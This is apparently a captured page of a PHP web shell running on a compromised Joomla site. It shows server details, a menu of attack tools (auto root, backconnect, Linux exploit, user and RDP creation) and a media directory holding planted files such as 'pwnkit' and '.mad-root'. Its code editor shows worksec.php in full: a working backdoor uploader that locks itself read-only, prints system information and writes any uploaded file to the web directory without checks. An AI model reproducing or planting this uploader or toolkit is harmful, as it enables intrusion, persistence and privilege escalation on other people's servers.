Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
[ HOME SHELL ]
Name
Size
Permission
Action
cache
[ DIR ]
drwxr-xr-x
com_actionlogs
[ DIR ]
drwxr-xr-x
com_admin
[ DIR ]
drwxr-xr-x
com_akeebabackup
[ DIR ]
drwxr-xr-x
com_associations
[ DIR ]
drwxr-xr-x
com_banners
[ DIR ]
drwxr-xr-x
com_cache
[ DIR ]
drwxr-xr-x
com_categories
[ DIR ]
drwxr-xr-x
com_config
[ DIR ]
drwxr-xr-x
com_contact
[ DIR ]
drwxr-xr-x
com_content
[ DIR ]
drwxr-xr-x
com_contenthistory
[ DIR ]
drwxr-xr-x
com_cpanel
[ DIR ]
drwxr-xr-x
com_fields
[ DIR ]
drwxr-xr-x
com_finder
[ DIR ]
drwxr-xr-x
com_hikashop
[ DIR ]
drwxr-xr-x
com_installer
[ DIR ]
drwxr-xr-x
com_joomlaupdate
[ DIR ]
drwxr-xr-x
com_languages
[ DIR ]
drwxr-xr-x
com_mails
[ DIR ]
drwxr-xr-x
com_media
[ DIR ]
drwxr-xr-x
com_menus
[ DIR ]
drwxr-xr-x
com_modules
[ DIR ]
drwxr-xr-x
com_sppagebuilder
[ DIR ]
drwxr-xr-x
com_tags
[ DIR ]
drwxr-xr-x
com_templates
[ DIR ]
drwxr-xr-x
com_users
[ DIR ]
drwxr-xr-x
com_workflow
[ DIR ]
drwxr-xr-x
com_wrapper
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
legacy
[ DIR ]
drwxr-xr-x
mailto
[ DIR ]
drwxr-xr-x
mod_articles_news
[ DIR ]
drwxr-xr-x
mod_languages
[ DIR ]
drwxr-xr-x
mod_login
[ DIR ]
drwxr-xr-x
mod_menu
[ DIR ]
drwxr-xr-x
mod_multilangstatus
[ DIR ]
drwxr-xr-x
mod_quickicon
[ DIR ]
drwxr-xr-x
mod_sampledata
[ DIR ]
drwxr-xr-x
plg_captcha_recaptcha
[ DIR ]
drwxr-xr-x
plg_captcha_recaptcha_invisibl...
[ DIR ]
drwxr-xr-x
plg_content_vote
[ DIR ]
drwxr-xr-x
plg_editors_codemirror
[ DIR ]
drwxr-xr-x
plg_editors_none
[ DIR ]
drwxr-xr-x
plg_editors_tinymce
[ DIR ]
drwxr-xr-x
plg_installer_folderinstaller
[ DIR ]
drwxr-xr-x
plg_installer_packageinstaller
[ DIR ]
drwxr-xr-x
plg_installer_urlinstaller
[ DIR ]
drwxr-xr-x
plg_installer_webinstaller
[ DIR ]
drwxr-xr-x
plg_media-action_crop
[ DIR ]
drwxr-xr-x
plg_media-action_resize
[ DIR ]
drwxr-xr-x
plg_media-action_rotate
[ DIR ]
drwxr-xr-x
plg_quickicon_akeebabackup
[ DIR ]
drwxr-xr-x
plg_quickicon_extensionupdate
[ DIR ]
drwxr-xr-x
plg_quickicon_joomlaupdate
[ DIR ]
drwxr-xr-x
plg_quickicon_overridecheck
[ DIR ]
drwxr-xr-x
plg_quickicon_privacycheck
[ DIR ]
drwxr-xr-x
plg_system_debug
[ DIR ]
drwxr-xr-x
plg_system_stats
[ DIR ]
drwxr-xr-x
plg_system_webauthn
[ DIR ]
drwxr-xr-x
plg_user_token
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin.php
5.24
KB
-rw-r--r--
file.php
80.47
KB
-rw-r--r--
index.html
31
B
-rw----r--
index.php
14
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close